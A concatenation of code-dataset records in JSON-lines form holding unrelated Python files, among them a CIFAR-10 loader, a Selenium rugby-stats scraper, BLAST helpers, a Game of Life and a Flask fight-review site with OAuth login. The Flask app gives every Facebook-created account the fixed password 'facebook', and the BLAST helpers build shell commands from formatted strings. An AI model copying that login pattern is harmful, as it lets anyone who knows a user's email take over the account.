替换为用户的secret_key\nregion = 'ap-beijing' # 替换为用户的region\ntoken = None # 使用临时密钥需要传入Token,默认为空,可不填\nscheme = 'http'\nconfig = CosConfig(Region=region, SecretId=secret_id, SecretKey=secret_key, Token=token, Scheme=scheme) # 获取配置对象\nclient = CosS3Client(config)\n\ntest_bucket = 'examplebucket-1250000000'\n# 发起拉取任务\nresponse = client.put_async_fetch_task(\n Bucket=test_bucket,\n FetchTaskConfiguration={\n 'Url': 'http://examplebucket-1250000000.cos.ap-beijing.myqcloud.com/exampleobject',\n 'Key': 'exampleobject'\n }\n)\n\n# 查询拉取任务\nresponse = client.get_async_fetch_task(\n Bucket=test_bucket,\n TaskId=response['data']['taskid']\n)\n","sub_path":"demo/fetch_demo.py","file_name":"fetch_demo.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"99322340","text":"import cPickle as pickle\nimport numpy as np\nimport os\nimport urllib\nimport tarfile\nimport zipfile\nimport sys\n\ndef get_cifar_data(dir, option='train'):\n x = None\n y_fine = None\n\n maybe_download_and_extract(dir)\n\n train_name = ['data_batch_' + str(i+1) for i in range(5)]\n eval_name = ['test_batch']\n num_fine_classes = 10\n fine_label_key = 'labels'\n coarse_label_key = ''\n\n folder_name = dir + '/cifar10'\n if option == \"train\":\n for f_name in train_name:\n trainfile = os.path.join(folder_name, f_name)\n with open(trainfile, 'rb') as f:\n datadict = pickle.load(f)\n _x = datadict.get(\"data\")\n _x = np.array(_x)\n _x = _x.reshape([-1, 3, 32, 32])\n _x = _x.transpose([0, 2, 3, 1])\n _x = _x.reshape(-1, 32, 32, 3)\n\n _y_fine = np.array(datadict.get(fine_label_key))\n _y_coarse = np.array(datadict.get(coarse_label_key))\n\n if x is None:\n x = _x\n y_fine = _y_fine\n else:\n x = np.concatenate((x,_x), axis=0)\n y_fine = np.concatenate((y_fine,_y_fine), axis=0)\n\n elif option == \"test\":\n for f_name in eval_name:\n evalfile = os.path.join(folder_name, f_name)\n with open(evalfile, 'rb') as f:\n datadict = pickle.load(f)\n _x = datadict.get(\"data\")\n _x = np.array(_x)\n _x = _x.reshape([-1, 3, 32, 32])\n _x = _x.transpose([0, 2, 3, 1])\n x = _x.reshape(-1, 32, 32, 3)\n\n y_fine = np.array(datadict.get(fine_label_key))\n\n def dense_to_one_hot(labels_dense, num_classes):\n if num_classes is 0:\n labels_one_hot = None\n else:\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n\n return x, dense_to_one_hot(y_fine, num_classes=num_fine_classes)\n\ndef _print_download_progress(count, block_size, total_size):\n pct_complete = float(count * block_size) / total_size\n msg = \"\\r- Download progress: {0:.1%}\".format(pct_complete)\n sys.stdout.write(msg)\n sys.stdout.flush()\n\ndef maybe_download_and_extract(dir):\n main_directory = dir + '/'\n\n if not os.path.exists(main_directory):\n os.makedirs(main_directory)\n url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n filename = url.split('/')[-1]\n file_path = os.path.join(main_directory, filename)\n zip_cifar = file_path\n file_path, _ = urllib.urlretrieve(url=url, filename=file_path, reporthook=_print_download_progress)\n\n print()\n print(\"Download finished. Extracting files.\")\n if file_path.endswith(\".zip\"):\n zipfile.ZipFile(file=file_path, mode=\"r\").extractall(main_directory)\n elif file_path.endswith((\".tar.gz\", \".tgz\")):\n tarfile.open(name=file_path, mode=\"r:gz\").extractall(main_directory)\n print(\"Done.\")\n os.rename(main_directory + \"./cifar-10-batches-py\", main_directory + './cifar10')\n os.remove(zip_cifar)\n\nif __name__ ==\"__main__\":\n pass\n","sub_path":"cifar_input.py","file_name":"cifar_input.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"333507977","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options \nfrom selenium.webdriver.support.select import Select\nimport json\nimport time\nimport args\nimport sys\nimport arrow\nfrom datetime import datetime\n\n\"\"\"\nThis scrapes Leinster Rugbys historical players, it uses the Selenium Python library to mimic a web page, traverse\nthe page and locate the data we want\n\"\"\"\ndef managePlayerListPage():\n time.sleep(2) #Give page time to load\n chrome_options = Options() #With Selenium you can set options\n chrome_options.add_argument(\"--start-maximized\") #The table gets messed up if the window is not maximised\n #chrome_options.add_argument(\"--headless\") #its faster when headless \n driver = webdriver.Chrome(options= chrome_options)\n url = \"https://www.leinsterrugby.ie/teams/historic-leinster-squads/\"\n driver.get(url)\n players = []\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #selects dropdown menu\n temp =dropdown.options\n result = []\n for i in range(0, len(temp)): #This iterates through every year\n dropdown = Select(driver.find_element_by_class_name('user-split-by'))\n dropdown.select_by_index(i)\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #prevents stale element exception\n result, players = handlePlayerListPage(driver, players, result)\n toJson(result)\n\ndef handlePlayerListPage(driver, players, all_players):\n time.sleep(2)\n temp = driver.find_elements_by_xpath('//a[@href]')\n text = {}\n \n for item in temp:\n text[item.text] = item.get_attribute(\"href\")\n for k, v in text.items():\n if k not in players and 'historic-players' in v.split('/'): #Keeps a list of players who have already been processed\n driver.get(v)\n all_players.append(managePlayerPage(driver, k))\n players.append(k)\n driver.back()\n return all_players, players\n\ndef managePlayerPage(driver, name):#This method manages the iteration over a player page\n player = {}\n try: #Some records are empty and do not have a drop down, this deals with this case\n dropdown = Select(driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-34-content\"]/div/div[1]/select')) \n except:\n print(\"Problem with page skipping \" + name)\n return player\n temp =dropdown.options\n \n list_of_seasons = []\n for i in range(0, len(temp)):\n dropdown = Select(driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-34-content\"]/div/div[1]/select')) \n season = dropdown.options[i].text\n if season == '':\n season = \"2019\"\n dropdown.select_by_index(i)\n list_of_seasons.append(handlePlayerPage(driver, season)) #appends each season to a player\n player_details = get_player_details(driver)\n player['Season_Totals'] = get_total_season_details(driver)\n player['Player_Details'] = player_details\n player['Season_Details'] = list_of_seasons\n player['Player_Name'] = name\n print(name)\n return player\n\ndef get_player_details(driver):\n \n \n player_details = {}\n header_els = driver.find_elements_by_xpath('//*[@id=\"sotic_wp_widget-32-content\"]')\n header_list = header_els[0].text.split('\\n')\n if len(header_list) % 2 ==1:\n header_list.append('')\n for i in range(0, int(len(header_list)), 2):\n player_details[header_list[i]] = header_list[i+1]\n return player_details\n\ndef get_total_season_details(driver):\n all_seasons=[]\n button = driver.find_element_by_xpath('//*[@id=\"competition\"]')\n button.click()\n table = driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-33-content\"]/div/div/table')\n text = table.text\n text = text.split('\\n')\n header = text[0].split(' ')\n body = text[1:]\n for item in body:\n season_details={}\n components = item.split(' ')\n if components[1].isnumeric():\n for i in range(0, len(components)):\n if i == 0:\n season_details['Overall_Total'] = components[i]\n else:\n season_details[header[i]] = components[i]\n else:\n components[0:2] = [' '.join(components[0:2])]\n if components[0][0].isnumeric():\n for i in range(0, len(components)):\n season_details['Season'] = components[0]\n if i == 0:\n season_details['Season_Total'] = components[i]\n else:\n season_details[header[i]] = components[i]\n \n \n for i in range(0, len(components)):\n season_details[header[i]] = components[i]\n all_seasons.append(season_details)\n driver.back()\n return all_seasons\n\ndef handlePlayerPage(driver, season):\n time.sleep(2)\n season_details = {}\n test = driver.find_elements_by_tag_name('tr')\n\n body = []\n season_total = []\n\n \n for item in test:\n if item.text is not '':\n if item.text[0:5] != 'Total':\n body.append(item.text)\n else:\n season_total.append(item.text)\n headers = body[0]\n body.pop(0)\n player_details_by_season = {}\n games = []\n all_games = []\n ind_game = {}\n for item in body: #The table is returned as a 1 line string that is not split. I split by space and\n components = item.split(' ') \n if len(item.split(' ')) > 4:\n if item.split(' ')[4].isnumeric() == False:\n components[1:5] = [' '.join(components[1:5])]\n elif item.split(' ')[3].isnumeric() == False:\n if item.split(' ')[3] == '92':\n components[1:5] = [' '.join(components[1:5])]\n else:\n components[1:4] = [' '.join(components[1:4])]\n elif item.split(' ')[2].isnumeric() == False:\n if item.split(' ')[2] == '92':\n components[1:4] = [' '.join(components[1:4])]\n else:\n components[1:3] = [' '.join(components[1:3])]\n games.append(components)\n headers = headers.split()\n for item in games:\n if len(item)> len(headers):\n item.pop(len(item)-1)\n for i in range(0, len(item)):\n ind_game[headers[i]] = item[i]\n all_games.append(ind_game.copy())\n season_details['Games'] = all_games\n season_details['Season'] = season\n return season_details\n\ndef toJson(results):\n with open('Leinster_result1.json', 'w') as fp:\n json.dump(results, fp, ensure_ascii = False)\n\ndef get_highest_date():\n player_date = {}\n with open(\"Leinster_result.json\") as f:\n full_dict = json.loads(f.read())\n for item in full_dict:\n this_season = item['Season_Details']\n name = item['Player_Name']\n try:\n games = this_season[0]['Games']\n except:\n print(\"player played no games\")\n most_recent_date = games[-1]['DATE']\n if len(most_recent_date.split('/')[0]) < 2:\n most_recent_date = \"0\"+most_recent_date \n most_recent_date_time = arrow.get(most_recent_date, 'DD/MM/YYYY')\n player_date[name] = most_recent_date_time\n return full_dict, player_date\n \n\ndef get_update(full_dict, date):\n time.sleep(2) #Give page time to load\n chrome_options = Options() #With Selenium you can set options\n chrome_options.add_argument(\"--start-maximized\") #The table gets messed up if the window is not maximised\n #chrome_options.add_argument(\"--headless\") #its faster when headless \n driver = webdriver.Chrome(options= chrome_options)\n url = \"https://www.leinsterrugby.ie/teams/historic-leinster-squads/\"\n driver.get(url)\n players = []\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #selects dropdown menu\n temp =dropdown.options\n result = []\n dropdown = Select(driver.find_element_by_class_name('user-split-by'))\n dropdown.select_by_index(0)\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #prevents stale element exception\n temp = driver.find_elements_by_xpath('//a[@href]')\n text = {}\n for item in temp:\n text[item.text] = item.get_attribute(\"href\")\n for k, v in text.items():\n if k not in players and 'historic-players' in v.split('/'): #Keeps a list of players who have already been processed\n driver.get(v)\n count = 0\n for i in range(0, len(full_dict)):\n if k == full_dict[i]['Player_Name']:\n count = i\n break\n \n full_dict[count]['Season_Details'][0] = handlePlayerPage(driver, '2019')\n full_dict[count]['Season_Totals'] = get_total_season_details(driver)\n driver.back()\n result, players = handlePlayerListPage(driver, players, result)\n toJson(result)\n\n\n \nif __name__ == \"__main__\":\n\n global players\n players = {}\n full_dict, date = get_highest_date()\n get_update(full_dict, date)\n managePlayerListPage()\n","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"382383371","text":"\"\"\"functions to write/run/read files using the BLAST+ and a local database.\n\"\"\"\n\nimport os\nimport sys\nimport subprocess\nimport numpy\nimport shutil\nfrom Bio.Blast import NCBIXML\n\n_DEBUG_MK = 0\n\n\"\"\"Functions are used within the FilterBlast class to select sequences based on a local blast filtering step.\"\"\"\n\ndef debug(msg):\n \"\"\"short debugging command\n \"\"\"\n if _DEBUG_MK == 1:\n print(msg)\n \n\ndebug(\"Current local_blast version number: 10252018.0\")\n\n\ndef del_blastfiles(workdir):\n \"\"\"Deletes all files in the local blast folder.\n \"\"\"\n try:\n shutil.rmtree(os.path.join(workdir, \"blast\"))\n except: \n sys.stderr.write(\"Blast folder was not removed. Maybe it was not present?\")\n\n\ndef run_filter_blast(workdir, blast_seq, blast_db, output=None):\n \"\"\"Runs a local blast to get measurement of differentiation between available sequences for the same taxon concept.\n\n The blast run will only be run if there are more sequences found than specified by the threshold value.\n When several sequences are found per taxon, blasts each seq against all other ones found for that taxon.\n The measure of differentiation will then be used to select a random representative from the taxon concept,\n but allows to exclude potential mis-identifications.\n In a later step (select_seq_by_local_blast) sequences will be selected based on the blast results generated here.\n\n # Note: has test, runs -> test_run_local_blast.py\n\n :param blast_seq: Name of the file which contains the query seq\n :param blast_db: Name of the file which contains the seq that shall be blasted against - Note, file needs to be in fasta format\n :param output: Optional outpu filename\n \"\"\"\n\n debug(\"run_filter_blast\")\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n out_fn = \"{}_tobeblasted\".format(str(blast_seq))\n cmd1 = \"makeblastdb -in {}_db -dbtype nucl\".format(blast_db)\n os.system(cmd1)\n if output is None:\n cmd2 = \"blastn -query {} -db {}_db -out output_{}.xml -outfmt 5\".format(out_fn, blast_db, out_fn)\n else:\n cmd2 = \"blastn -query {} -db {}_db -out {} -outfmt 5\".format(out_fn, blast_db, output)\n os.system(cmd2)\n os.chdir(general_wd)\n\n\ndef calculate_mean_sd(hsp_scores):\n \"\"\"Calculates standard deviation and mean of scores which are used as a measure of sequence differentiation\n for a given taxon.\n\n This is being used to select a random representative of a taxon later.\n\n Note: has test, runs: test_calculate_mean_sd.py\n\n :param hsp_scores: is a dict generated in read_filter_blast:\n hsp_scores[gi_id] = {'hsp.bits': hsp.bits, 'hsp.score': hsp.score,\n 'alignment.length': alignment.length, 'hsp.expect': hsp.expect}\n \"\"\"\n debug('calculate_mean_sd')\n total_seq = 0\n bit_sum = 0\n bit_l = []\n for gi_id in hsp_scores:\n total_seq += 1\n bit_sum += hsp_scores[gi_id][\"hsp.bits\"]\n bit_l.append(hsp_scores[gi_id][\"hsp.bits\"])\n bit_sd = float(numpy.std(bit_l))\n mean_hsp_bits = float(bit_sum / total_seq)\n mean_sd = {\"mean\": mean_hsp_bits, \"sd\": bit_sd}\n return mean_sd\n\n\ndef read_filter_blast(workdir, seq_d, fn):\n \"\"\"Reads the files of the local blast run and returns sequences below a value\n (within the sd of the mean scores of the hsp.bit scores at the moment).\n\n (this is to make sure seqs chosen are representative of the taxon)\n\n Note: has test, runs: test_read_local_blast.py\n\n \"\"\"\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n output_blast = \"output_{}_tobeblasted.xml\".format(fn)\n xml_file = open(output_blast)\n os.chdir(general_wd)\n blast_out = NCBIXML.parse(xml_file)\n hsp_scores = {}\n tries = 5\n for i in range(tries):\n try:\n for record in blast_out:\n for alignment in record.alignments:\n for hsp in alignment.hsps:\n gi_id = alignment.title.split(\" \")[1]\n if gi_id.isdigit():\n gi_id = int(gi_id)\n hsp_scores[gi_id] = {'hsp.bits': hsp.bits, 'hsp.score': hsp.score,\n 'alignment.length': alignment.length, 'hsp.expect': hsp.expect}\n except ValueError:\n debug(\"rebuild the local blast db and try again\")\n sys.stderr.write(\"{} blast file has a problem. Redo running it\".format(fn))\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n subprocess.call([\"rm\", \"{}_db.*\".format(fn)])\n cmd1 = \"makeblastdb -in {}_db -dbtype nucl\".format(fn)\n os.system(cmd1)\n cmd2 = \"blastn -query {}_tobeblasted -db {}_db -out output_{}tobeblasted.xml -outfmt 5\".format(fn, fn, fn)\n os.system(cmd2)\n os.chdir(general_wd)\n if i < tries - 1: # i is zero indexed\n continue\n else:\n # debug(\"im going to raise\")\n raise\n break\n # make values to select for blast search, calculate standard deviation,mean\n mean_sd = calculate_mean_sd(hsp_scores)\n # select which sequences to use\n seq_blast_score = {}\n for gi_id in hsp_scores: # use only seq that are similar to mean plus minus sd\n if (hsp_scores[gi_id]['hsp.bits'] >= mean_sd['mean'] - mean_sd['sd']) & \\\n (hsp_scores[gi_id]['hsp.bits'] <= mean_sd['mean'] + mean_sd['sd']):\n if gi_id in seq_d:\n seq_blast_score[gi_id] = seq_d[gi_id]\n return seq_blast_score\n\n\ndef write_filterblast_files(workdir, file_name, seq, db=False, fn=None):\n \"\"\"Writes local blast files which will be read by run_filter_blast.\n \"\"\"\n debug(\"writing files\")\n if not os.path.exists(\"{}/blast\".format(workdir)):\n os.makedirs(\"{}/blast/\".format(workdir))\n if db:\n fnw = \"{}/blast/{}_db\".format(workdir, fn)\n fi_o = open(fnw, \"a\")\n else:\n fnw = \"{}/blast/{}_tobeblasted\".format(workdir, fn)\n fi_o = open(fnw, \"w\")\n fi_o.write(\">{}\\n\".format(file_name))\n fi_o.write(\"{}\\n\".format(str(seq).replace(\"-\", \"\")))\n fi_o.close()\n","sub_path":"physcraper/local_blast.py","file_name":"local_blast.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"59165963","text":"\"\"\"Provides various core tools.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport sys\n\n\nPY3 = sys.version_info[0] == 3\n\"\"\"True if we are running under Python 3.\"\"\"\n\nif PY3:\n range = range\nelse:\n range = xrange\n\nif PY3:\n bytes = bytes\n str = str\nelse:\n bytes = str\n str = unicode\n","sub_path":"pcore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"560184845","text":"# -*- coding:utf-8 -*-\nfrom rest_framework import serializers\n\nfrom ..models import Organization\nfrom ...contacts.models import Contact\n\n\nclass OrganizationSerializer(serializers.ModelSerializer):\n\n contact = serializers.PrimaryKeyRelatedField(\n queryset=Contact.objects.all(),\n write_only=True,\n )\n\n class Meta:\n model = Organization\n fields = ('company', 'title', 'contact',)\n","sub_path":"kratzz/applications/organizations/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243863785","text":"# Dataprocessing\n# Week 3: Interactive Bar Chart with D3\n#\n# Tiny Le\n# 11130717\n\nimport csv\nimport json\n\n# Load in CSV\nwith open('knmi.csv', 'r') as csvFile:\n # Encoding the content in utf-8-sig to remove the BOM at beginning\n # https://stackoverflow.com/questions/8898294/convert-utf-8-with-bom-to-utf-8-with-no-bom-in-python\n csvData = csv.reader(csvFile.read().decode('utf-8-sig').encode('utf-8').splitlines())\n\n# Empty arrays to store the CSV and JSON data\njsonData= []\ndata = []\n\n# Go through every line in the CSV file\nfor row in csvData:\n date = row[0]\n day = date[6:8]\n month = date[4:6]\n year = date[0:4]\n\n # Formate dates to be more readable\n dateFormatted = day + '-' + month + '-' + year\n amount = int(row[1])\n\n # Turn it into json format\n data = { 'date':dateFormatted, 'amount':str(amount) }\n\n # Only save the last two weeks of November\n if int(day) > 16 and int(month) == 11:\n jsonData.append(data)\n\n# Open JSON file and write the data\nwith open('knmi.json', 'w') as jsonFile:\n json.dump(jsonData, jsonFile)\n","sub_path":"Homework/week_3/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"168757042","text":"import pygame\nimport random\n# Define some colors and other constants\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (25, 25, 25)\nRED = (255, 0, 0)\nMARGIN = 3\nSQ_LENGTH = 20\nSQ_NUM = 25\nWIN_SIZE = (SQ_NUM + 1) * MARGIN + SQ_NUM * SQ_LENGTH\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (WIN_SIZE, WIN_SIZE)\nscreen = pygame.display.set_mode(size)\n\nautomata = [0] * (SQ_NUM * SQ_NUM)\n\n# Assign Random Values to our Automata\n# rowx:\n# col:\n# automata[row * SQ_NUM + col] = set to a random number\n\n# for i in range(SQ_NUM * SQ_NUM):\n# automata[i] = random.randint(0, 1)\n\nfor row in range(SQ_NUM):\n for col in range(SQ_NUM):\n automata[row * SQ_NUM + col] = random.randint(0, 1)\n\n\n# Title\npygame.display.set_caption(\"Conway's Game of Life\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n# --- Game logic should go here\n # Update State ( Add Rules to update each cell based on it's previous state )\n\n # Create a new automata for the next state\n new_automata = [0] * (SQ_NUM * SQ_NUM)\n\n for i in range(len(automata)):\n live = 0\n dead = 8\n\n # look at neighbors\n # (8 if conditions)\n if i - 1 >= 0 and automata[i - 1]:\n live += 1\n if i + 1 < (SQ_NUM * SQ_NUM) and automata[i + 1]:\n live += 1\n # TODO: the other neighbours\n if i - SQ_NUM >= 0 and automata[i - SQ_NUM]:\n live += 1\n if i + SQ_NUM < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM]:\n live += 1\n if i - SQ_NUM - 1 >= 0 and automata[i - SQ_NUM - 1]:\n live += 1\n if i + SQ_NUM + 1 < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM + 1]:\n live += 1\n if i - SQ_NUM - 1 >= 0 and automata[i - SQ_NUM + 1]:\n live += 1\n if i + SQ_NUM + 1 < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM - 1]:\n live += 1\n\n dead -= live\n # Update State\n # if there are less than 2 living neighbors the cell dies\n if automata[i] and live < 2:\n new_automata[i] = 0\n # if alive and has less than 4 neighbors then cell carrys on living\n elif automata[i] and live < 4:\n new_automata[i] = 1\n # TODO: 3 more conditions\n elif automata[i] and live >= 4:\n new_automata[i] = 0\n elif not automata[i] and live == 3:\n new_automata[i] = 1\n else:\n new_automata[i] = 0\n\n # swap the data for the next generations data\n automata = new_automata\n\n # --- Screen-clearing code goes here\n # Here, we clear the screen to gray. Don't put other drawing commands\n # above this, or they will be erased with this command.\n screen.fill(GRAY)\n automata[12] = 1\n # --- Drawing code should go here\n # pygame.draw.rect(screen, RED, pygame.Rect(20, 20, 20, 20))\n y = MARGIN\n i = 0\n while y < WIN_SIZE:\n x = MARGIN\n while x < WIN_SIZE:\n if automata[i] == 0:\n pygame.draw.rect(screen, BLACK, pygame.Rect(\n x, y, SQ_LENGTH, SQ_LENGTH))\n else:\n pygame.draw.rect(screen, WHITE, pygame.Rect(\n x, y, SQ_LENGTH, SQ_LENGTH))\n i += 1\n x += SQ_LENGTH + MARGIN\n y += SQ_LENGTH + MARGIN\n\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n# --- Limit to 5 frames per second\n clock.tick(5)\n# Close the window and quit.\npygame.quit()\n","sub_path":"src/conways.py","file_name":"conways.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"77529117","text":"from myproject import app, db, GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET, GOOGLE_DISCOVERY_URL, client, facebook, OAuthException\nfrom flask import render_template, redirect, request, jsonify, url_for, flash, abort, request, session\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom datetime import datetime\nimport uuid\nimport requests\nimport json\nfrom sqlalchemy.sql import func\nfrom myproject.models import User, Comment, Review, Fight, FightCard\nfrom myproject.forms import LoginForm, RegistrationForm, CommentForm, ReviewForm, FightForm\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_dance.consumer import oauth_authorized, oauth_error\n\n@app.route('/')\ndef home():\n return render_template('home.html', cards=FightCard.query.order_by(FightCard.id.desc()).all(), #list of cards for main page\n maincard=FightCard.query.order_by(FightCard.id.desc()).first()) #grab most recent card for main image\n@app.route('/fuckoff')\ndef fuckoff():\n pass\n\n@app.route('/fight_card/')\ndef fight_card(card_id):\n card = FightCard.query.filter_by(id=card_id).first_or_404(card_id)\n return render_template('fight_card.html', fights=Fight.query.filter_by(fight_card=card.id).all(), #filters fights by fight card\n card=card,\n reviews=Review.query.all())\n\n\n@app.route('/fight_card/fight/', methods=('GET', 'POST'))\ndef fight(fight_id):\n reviewform = ReviewForm()\n commentform = CommentForm()\n fight = Fight.query.filter_by(id=fight_id).first_or_404(fight_id)\n fight_url = request.url\n rating = Review.query.with_entities(func.avg(Review.rating)).filter(Review.fight_id == fight.id).scalar()\n if reviewform.submitreview.data and reviewform.is_submitted():\n review_exists = Review.query.filter_by(user_id=current_user.username, fight_id=fight.id).first()\n if review_exists:\n flash(\"You've already left a review for this fight!\")\n return redirect(url_for('fight', fight_id=fight_id))\n review = Review(rating=reviewform.rating.data,\n title=reviewform.title.data,\n content=reviewform.content.data,\n user_id=current_user.username,\n fight_id=fight.id)\n db.session.add(review)\n fight = Fight.query.filter_by(id=fight.id).first()\n fight.rating = Review.query.with_entities(func.avg(Review.rating)).filter(Review.fight_id == fight.id).scalar()\n db.session.commit()\n flash('Review has been posted')\n return redirect(url_for('fight', fight_id=fight_id))\n if commentform.submitcomment.data and commentform.validate():\n comment = Comment(content=commentform.content.data,\n user_id=current_user.username,\n review_id=request.form.get('reviewID'))\n db.session.add(comment)\n db.session.commit()\n flash('Comment has been posted')\n return redirect(url_for('fight', fight_id=fight_id))\n return render_template('fight.html', fights=Fight.query.filter_by(id=fight_id).all(),\n reviewform=reviewform,\n fight=fight,\n commentform=commentform,\n rating=rating,\n fight_url = fight_url,\n reviews=Review.query.filter_by(fight_id=fight.id),\n comments=Comment.query.all())\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user == None:\n flash('User does not exist!')\n return redirect(url_for('login'))\n if user.check_password(form.password.data) and user is not None:\n\n login_user(user, remember=True)\n flash('Logged in successfully.')\n\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n\n return redirect(next)\n else:\n flash('Wrong password!')\n return redirect(url_for('login'))\n\n return render_template('login.html', form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n email_exists = User.query.filter_by(email=form.email.data).first()\n if email_exists:\n flash('Email is already in use!')\n return redirect(url_for('register'))\n user_exists = User.query.filter_by(username=form.username.data).first()\n if user_exists:\n flash('Username is already in use!')\n return redirect(url_for('register'))\n user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('Thanks for registering!')\n return redirect(url_for('home'))\n return render_template('register.html', form=form)\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n@app.route(\"/google_login\")\ndef google_login():\n # Find out what URL to hit for Google login\n google_provider_cfg = get_google_provider_cfg()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n # Use library to construct the request for Google login and provide\n # scopes that let you retrieve user's profile from Google\n request_uri = client.prepare_request_uri(authorization_endpoint,\n redirect_uri=request.base_url + \"/callback\",\n scope=[\"openid\", \"email\", \"profile\"])\n return redirect(request_uri)\n# create/login local user on successful OAuth login\n@app.route(\"/google_login/callback\")\ndef callback():\n # Get authorization code Google sent back to you\n code = request.args.get(\"code\")\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n token_url, headers, body = client.prepare_token_request(token_endpoint,\n authorization_response=request.url,\n redirect_url=request.base_url,\n code=code)\n token_response = requests.post(token_url,\n headers=headers,\n data=body,\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET))\n client.parse_request_body_response(json.dumps(token_response.json()))\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n\n if userinfo_response.json().get(\"email_verified\"):\n unique_id = userinfo_response.json()[\"sub\"]\n users_email = userinfo_response.json()[\"email\"]\n users_name = userinfo_response.json()[\"name\"]\n else:\n return \"User email not available or not verified by Google.\", 400\n user = User.query.filter_by(email=users_email).first()\n if user:\n login_user(user, remember=True)\n else:\n user = User(email=users_email,\n username=users_name,\n password=unique_id)\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('You are logged in with Google!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\n@app.route('/facebook_login')\ndef facebook_login():\n callback = url_for('facebook_authorized',\n _external=True)\n return facebook.authorize(callback=callback)\n\n@app.route('/facebook_login/authorized')\ndef facebook_authorized():\n resp = facebook.authorized_response()\n if resp is None:\n return 'Access denied: reason=%s error=%s' % (\n request.args['error_reason'],\n request.args['error_description']\n )\n if isinstance(resp, OAuthException):\n return 'Access denied: %s' % resp.message\n\n session['oauth_token'] = (resp['access_token'], '')\n me = facebook.get('/me?fields=id,name,email')\n user = User.query.filter_by(email=me.data['email']).first()\n if user:\n login_user(user, remember=True)\n else:\n user = User(email=me.data['email'],\n username=me.data['name'],\n password=\"facebook\")\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('You are logged in with Facebook!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\n@facebook.tokengetter\ndef get_facebook_oauth_token():\n return session.get('oauth_token')\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash('You are logged out!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\napplication = app\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"379498393","text":"from flask import request\nfrom flask import session\nfrom flask import url_for\nfrom flask import jsonify\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import redirect\n\nfrom ..models import User\n\n\nmain = Blueprint('auth', __name__)\n\ndef 